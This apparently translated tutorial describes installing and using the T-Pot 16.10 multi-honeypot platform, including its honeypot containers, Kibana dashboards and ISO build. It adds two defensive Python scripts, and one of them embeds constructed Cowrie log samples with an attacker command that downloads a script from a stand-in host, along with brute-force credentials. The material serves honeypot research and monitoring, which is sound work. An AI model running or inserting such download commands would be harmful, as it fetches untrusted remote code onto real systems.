T-Pot Multi-Honeypot Platform: Making Honeypot Implementation Easier

 

Over the past two years honeypot technology has attracted growing attention, and low-, medium- and high-interaction honeypots have taken shape at every layer: web application honeypots, SSH honeypots, network protocol stack honeypots, function-specific honeypots and whole-host system honeypots. The spectrum runs from a single honeytoken such as a tagged Word document, to a system-level service honeypot, to a honeynet built from several function-specific honeypots, to a honey farm of distributed honeynets with traffic control and redirection.

Virtualization has brought virtual honeypots with it. High-interaction honeypots can be built on virtual machines, and service-oriented honeypots delivered as Docker containers no longer need the expensive dedicated hardware of earlier deployments, which greatly lowers the cost of running them. A single host can now run a complete multi-function, multi-honeypot, high-interaction honeynet that integrates data control, data capture and data analysis. Good open source honeypot projects have also appeared, such as MHN (Modern Honey Network) and the tools of the Honeynet Project. MHN simplifies honeypot deployment by bundling installation scripts for a range of honeypots, so sensors can be deployed quickly and their data collected centrally. A number of companies abroad are also building products on honeypot-based deception technology.

The high-fidelity, high-quality data set a honeypot produces frees security staff from sifting through massive logs: every connection to a honeypot is attack traffic, and unlike signature-based analysis there is no lag before a new attack becomes visible, so honeypots are well suited to catching new attack types and techniques. Some time ago the author used a high-interaction honeypot to capture an automated SSH brute-forcing tool that can run password-guessing attempts against the entire Internet and can automatically recognise some low-interaction honeypots.

There are now many honeypots, each covering one function. MHN simplifies deploying each of them, but you still have to install several sensor systems by hand to run several different honeypots. Is there a simpler, more convenient platform for honeypot research and use?

This article introduces T-Pot 16.10, an open source multi-honeypot platform: install the system once and you can easily run a variety of honeypots inside it, with good visualization built in. Official English introduction: https://dtag-dev-sec.github.io/mediator/feature/2016/10/31/t-pot-16.10.html

T-Pot 16.10 open source multi-honeypot platform

T-Pot 16.10 ships as a ready-made system ISO and implements its honeypots as Docker containers, which makes honeypot research and data capture much more convenient. Below is what it looked like after only six hours exposed to the Internet. Let's first see what it looks like and whether it makes you want to use it.

[Screenshots t1.png to t4.png: Kibana dashboards after six hours on the Internet]

Tempted to try it? Hold on; let's introduce it properly first.

T-Pot 16.10 is based on Ubuntu Server 16.04 LTS and provides the following Docker-based honeypot containers:

Conpot: A low-interaction industrial control system (ICS) honeypot that implements a range of common industrial control protocols and can simulate complex industrial infrastructures.

Cowrie: A medium-interaction SSH honeypot forked from Kippo. It records username/password brute-force attempts, offers a fake file system in which the attacker's shell activity is logged, and stores files fetched with wget/curl as well as files uploaded via SFTP and SCP.

Dionaea: A Linux application that listens on the default ports of common Internet services. When a connection arrives it emulates the service, answers as the real service would, and records the inbound and outbound network data. A detection module classifies the captured stream; if it contains shellcode, the shellcode is emulated, and the program automatically downloads the malicious file that the shellcode, or a later attack command, points to.

Elasticpot: A honeypot that simulates a vulnerable Elasticsearch instance exposed to remote code execution. It answers requests to /, /_search and /_nodes with forged JSON responses that mimic a vulnerable ES node.

Emobility: A high-interaction honeypot used in T-Pot to collect the motives and methods of attacks against next-generation transportation infrastructure. The eMobility honeynet consists of a central charging system and several charging points, with simulated user transactions. Once an attacker reaches the web interface of the central control system, they can monitor and manipulate the running charging transactions and interact with the charging points; at random times they may also interact with users who are charging their vehicles.

Glastopf: A low-interaction web application honeypot that can emulate thousands of web vulnerabilities, answer attackers in a way appropriate to their attack type, and collect data about the attack on the target web application. Its goal is to engage automated vulnerability scanners and exploitation tools: it classifies the exploitation attempt and returns a plausible response for that class of exploit.

Honeytrap: Observes attacks against TCP and UDP services. It runs as a daemon that emulates some well-known services, and it can analyse the attack strings it receives and carry out the file-download instructions they contain.


The platform also uses the following tools:

ELK: Elasticsearch, Logstash and Kibana, for visualizing the attack events captured by T-Pot

Elasticsearch-head: a web front end to browse and manipulate Elasticsearch clusters

Netdata: real-time performance monitoring

Portainer: web interface for Docker

Suricata: an open source network security threat detection engine (IDS)

Wetty: web-based SSH client

T-Pot is a network installation based on Ubuntu Server 16.04 LTS, so Internet connectivity must be available throughout the installation. The honeypot daemons and the other components are delivered as Docker containers. This lets several honeypot systems run behind a single network interface, keeps the whole system easy to maintain, and gives each honeypot good isolation and simple updates. Captured events can be forwarded by the ewsposter tool, which also supports sharing data via the Honeynet Project's hpfeeds.

T-Pot honeypot platform structure diagram:

[Figure t9.png: T-Pot platform architecture diagram]

Data inside a container is isolated from the host: if a container crashes, everything created inside its environment is lost and a fresh instance is started. Data that must survive, such as configuration files, therefore lives in the persistent directory /data/ on the host, which outlives reboots of the system and restarts of the containers. Important log data likewise goes to the host file system under /data/<container-name>, mounted into the container with Docker's volume option (-v), so applications inside the container write their logs to that directory.
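The /data layout described above makes a simple health check possible: if a container has crashed and come back without its state, or has stopped logging altogether, the newest file under /data/<container-name> stops getting newer. The script below is an added example written for this article, not T-Pot's own code. It assumes the directory names match the container names listed above and treats a directory with no file modified in the last 15 minutes as stale; both are assumptions, not facts from the page. demo() runs it offline against a constructed directory tree.

```python
"""Freshness check for T-Pot's persistent /data/<container> directories.
Added example for this article, not T-Pot code.
Assumptions (not from the article): the directory names in HONEYPOT_DIRS
and the 15-minute staleness threshold."""
import os
import tempfile
import time
from typing import Dict, List, Optional

# Assumed to match the container names; adjust to what `docker ps` shows.
HONEYPOT_DIRS = ["conpot", "cowrie", "dionaea", "elasticpot",
                 "emobility", "glastopf", "honeytrap"]
MAX_AGE_S = 15 * 60


def newest_mtime(path: str) -> Optional[float]:
    """Modification time of the most recently written file under path."""
    newest = None
    for root, _dirs, files in os.walk(path):
        for name in files:
            try:
                m = os.stat(os.path.join(root, name)).st_mtime
            except OSError:
                continue  # file rotated away between listing and stat
            if newest is None or m > newest:
                newest = m
    return newest


def check_data_dirs(base: str = "/data", names: List[str] = HONEYPOT_DIRS,
                    now: Optional[float] = None) -> Dict[str, Optional[float]]:
    """Map each honeypot name to the age in seconds of its newest file,
    or None if the directory is missing or contains no files."""
    now = time.time() if now is None else now
    ages: Dict[str, Optional[float]] = {}
    for name in names:
        path = os.path.join(base, name)
        m = newest_mtime(path) if os.path.isdir(path) else None
        ages[name] = None if m is None else now - m
    return ages


def stale(ages: Dict[str, Optional[float]], max_age_s: float = MAX_AGE_S) -> List[str]:
    """Honeypots that are missing, empty, or silent for longer than max_age_s."""
    return [n for n, age in ages.items() if age is None or age > max_age_s]


def demo() -> List[str]:
    """Run the check against a constructed /data tree in a temp directory."""
    base = tempfile.mkdtemp(prefix="tpot-data-")
    now = time.time()
    # cowrie: a log line written just now -> fresh
    os.makedirs(os.path.join(base, "cowrie", "log"))
    with open(os.path.join(base, "cowrie", "log", "cowrie.json"), "w") as f:
        f.write('{"eventid":"cowrie.session.connect"}\n')
    # dionaea: last write an hour ago -> stale
    os.makedirs(os.path.join(base, "dionaea"))
    old = os.path.join(base, "dionaea", "dionaea.log")
    with open(old, "w") as f:
        f.write("x\n")
    os.utime(old, (now - 3600, now - 3600))
    # glastopf: directory exists but nothing was ever written; conpot: missing
    os.makedirs(os.path.join(base, "glastopf"))
    ages = check_data_dirs(base, ["cowrie", "dionaea", "glastopf", "conpot"], now=now)
    return stale(ages)


if __name__ == "__main__":
    print("demo stale set:", demo())
    for name, age in check_data_dirs().items():
        label = "missing/empty" if age is None else "%.0fs ago" % age
        print("%-12s %s" % (name, label))
    print("stale on this host:", stale(check_data_dirs()))
```

Run it from cron on the T-Pot host and alert on a non-empty stale list; a honeypot that has been quiet for a quarter of an hour on a public IP is usually a container problem, not a quiet Internet.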

Hardware requirements: a T-Pot installation needs at least 4 GB of RAM, 64 GB of disk space and Internet access.

The system installation steps:

1. Download tpot.iso, or build your own installation image (see the ISO Creator section at the end).

2. Install it on an Internet-connected VM or physical machine. The process is the same as a normal Ubuntu installation; you will be asked to set a password for the tsec user.

3. On first boot after installation you are asked to choose the installation type, and the corresponding container services are downloaded and installed accordingly.

There are four installation types with different requirements; here we choose the standard T-Pot installation.

1) T-Pot Installation (Cowrie, Dionaea, ElasticPot, Glastopf, Honeytrap, ELK, Suricata+P0f & Tools)

2) Sensor Installation (Cowrie, Dionaea, ElasticPot, Glastopf, Honeytrap)

3) Industrial Installation (ConPot, eMobility, ELK, Suricata+P0f & Tools)

4) Everything Installation (all of the above)

Then set the password for the web account, fill in the remaining details, and the Docker images are downloaded and installed automatically. After a successful installation the system reboots into the following screen:

[Screenshot 42431.PNG: screen shown after the first reboot]

The entries in red are the public IP addresses.

The installation can fail because of a bad package source or an unstable network. In that case log in later as user tsec with the password set during installation, run sudo su to become root, and execute the installation script /root/install.sh by hand. The script detects that this is not a first run and aborts; to get past that, delete /root/install.err and /root/install.log together with the error markers it complains about, or, depending on the situation, comment out the steps the script has already completed and let it continue only with the commands that were interrupted.

4. Start using it.

Open the T-Pot control panel in a browser at https://ip:64297 and log in with the web account created during installation.

The Kibana dashboards shown earlier display the captured attack events, and you can design your own dashboards to suit your needs.

To capture attacks the T-Pot system must be reachable from the Internet, otherwise nothing will be captured. Here I exposed T-Pot by placing it in the router's DMZ. If you use NAT on the router instead, you need to forward the honeypot ports shown below to the T-Pot host.

[Screenshot t6.PNG: honeypot ports to forward through NAT]

T-Pot provides not only honeypot data capture but also the ELK stack for data processing and analysis, and it can run as an ELK cluster: the honeypots integrated in T-Pot can be deployed as distributed sensors on several systems for capture, with unified visual analysis in one place.

[Screenshot t7.PNG: ELK analysis view]
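Because the honeypot logs persist on the host under /data/<container-name>, they can also be analysed outside Kibana. The script below is an added example, not from the article or from T-Pot: it reads Cowrie's JSON event log and Suricata's EVE JSON log, correlates them by source IP, and reports failed and successful logins, credentials tried, downloaded files and IDS alerts per attacker. The paths /data/cowrie/log/cowrie.json and /data/suricata/log/eve.json are assumptions, and the sample log lines embedded in it are constructed for the example, not real captures.

```python
"""Correlate Cowrie and Suricata events per source IP.
Added example for this article, not T-Pot code.
Assumed (not from the article): the log paths in DEFAULT_PATHS.
The sample records below are constructed, not real captures."""
import json
from collections import Counter, defaultdict

DEFAULT_PATHS = {  # assumption: where T-Pot persists these logs on the host
    "cowrie": "/data/cowrie/log/cowrie.json",
    "suricata": "/data/suricata/log/eve.json",
}

# Constructed Cowrie JSON-lines records (field names follow Cowrie's JSON log).
# The last line is deliberately truncated, as the tail of a live log often is.
COWRIE_SAMPLE = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.7","session":"a1","timestamp":"2016-11-01T10:00:00Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"a1","username":"root","password":"123456"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","session":"a1","username":"root","password":"admin"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.7","session":"a1","username":"root","password":"root"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.7","session":"a1","input":"wget http://203.0.113.9/x.sh"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.7","session":"a1","url":"http://203.0.113.9/x.sh","shasum":"deadbeef","outfile":"dl/deadbeef"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.33","session":"b2","username":"admin","password":"admin"}
{"eventid":"cowrie.login.fa"""

# Constructed Suricata EVE records; the signature names are made up.
SURICATA_SAMPLE = """\
{"event_type":"alert","src_ip":"198.51.100.7","dest_port":22,"alert":{"signature":"EXAMPLE SSH brute force","severity":2}}
{"event_type":"flow","src_ip":"192.0.2.33","dest_port":80}
{"event_type":"alert","src_ip":"192.0.2.33","dest_port":80,"alert":{"signature":"EXAMPLE web SQL injection attempt","severity":2}}
"""


def parse_json_lines(text):
    """Yield one dict per line, skipping blank and unparseable lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # half-written tail line or junk: ignore, don't abort
        if isinstance(rec, dict):
            yield rec


def new_entry():
    return {"failed": 0, "success": 0, "commands": [],
            "creds": set(), "downloads": set(), "alerts": set()}


def summarize(cowrie_text, suricata_text):
    """Per-source-IP summary combining both logs."""
    per_ip = defaultdict(new_entry)
    for ev in parse_json_lines(cowrie_text):
        ip = ev.get("src_ip")
        if not ip:
            continue
        e = per_ip[ip]
        eid = ev.get("eventid", "")
        if eid == "cowrie.login.failed":
            e["failed"] += 1
            e["creds"].add((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.login.success":
            e["success"] += 1
            e["creds"].add((ev.get("username"), ev.get("password")))
        elif eid == "cowrie.command.input":
            e["commands"].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            e["downloads"].add((ev.get("url"), ev.get("shasum")))
    for ev in parse_json_lines(suricata_text):
        if ev.get("event_type") != "alert":
            continue  # flow, dns, http records are not alerts
        ip = ev.get("src_ip")
        sig = ev.get("alert", {}).get("signature")
        if ip and sig:
            per_ip[ip]["alerts"].add(sig)
    return dict(per_ip)


def top_passwords(cowrie_text, n=5):
    """Most-tried passwords across failed and successful logins."""
    c = Counter(ev.get("password") for ev in parse_json_lines(cowrie_text)
                if ev.get("eventid") in ("cowrie.login.failed", "cowrie.login.success"))
    return c.most_common(n)


def compromised_and_downloading(summary):
    """IPs that got a shell and then fetched a file: sessions worth a closer look."""
    return sorted(ip for ip, e in summary.items() if e["success"] and e["downloads"])


def load(path):
    with open(path, encoding="utf-8", errors="replace") as f:
        return f.read()


if __name__ == "__main__":
    # On a T-Pot host use load(DEFAULT_PATHS["cowrie"]), load(DEFAULT_PATHS["suricata"]).
    s = summarize(COWRIE_SAMPLE, SURICATA_SAMPLE)
    for ip, e in s.items():
        print(ip, e["failed"], "failed,", e["success"], "success,", sorted(e["alerts"]))
    print("top passwords:", top_passwords(COWRIE_SAMPLE))
    print("shell + download:", compromised_and_downloading(s))
```

The summary is keyed by src_ip because that is the one field both logs share; the downloaded-file entries carry the SHA-256 Cowrie records so the sample under /data/cowrie can be pulled for analysis without trusting the attacker's URL.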

It also provides a web interface for Docker (Portainer), through which the individual honeypot containers can be managed and controlled directly; you can also add your own containerized honeypots or services as needed.

[Screenshot t10.PNG: Portainer Docker web interface]

It also provides a web SSH client (Wetty), so you can log in to the system directly from the web console. Note that the SSH service on the system's real port 22 is actually the Cowrie honeypot; the web console is the convenient way to reach the real system, which is a sensible design.

[Screenshot t11.PNG: Wetty web SSH client]

There is also a powerful performance monitoring platform (Netdata) that shows the resource usage of the host and of each container in real time.

[Screenshot t8.png: Netdata monitoring]

You can also use the ISO Creator to build your own installation image.

Requirements for building the image:

Ubuntu 16.04 LTS or newer as the build host (other systems are untested), at least 4 GB of memory and 32 GB of disk space.

Create an ISO image:

1. Clone the repository and enter its directory:

git clone https://github.com/dtag-dev-sec/tpotce.git

cd tpotce

2. Run the script that builds the ISO image. It downloads and installs the required dependencies and fetches the Ubuntu network installation image (about 50 MB) on which T-Pot is based:

sudo ./makeiso.sh

When it finishes you will find two files, tpot.iso and tpot.sha256, in the directory.

Now you can run honeypots with ease. Some time ago I also packaged some high-interaction honeypots as Docker containers; these can now be integrated easily into the T-Pot platform, making honeypot deployment simpler and more capable.
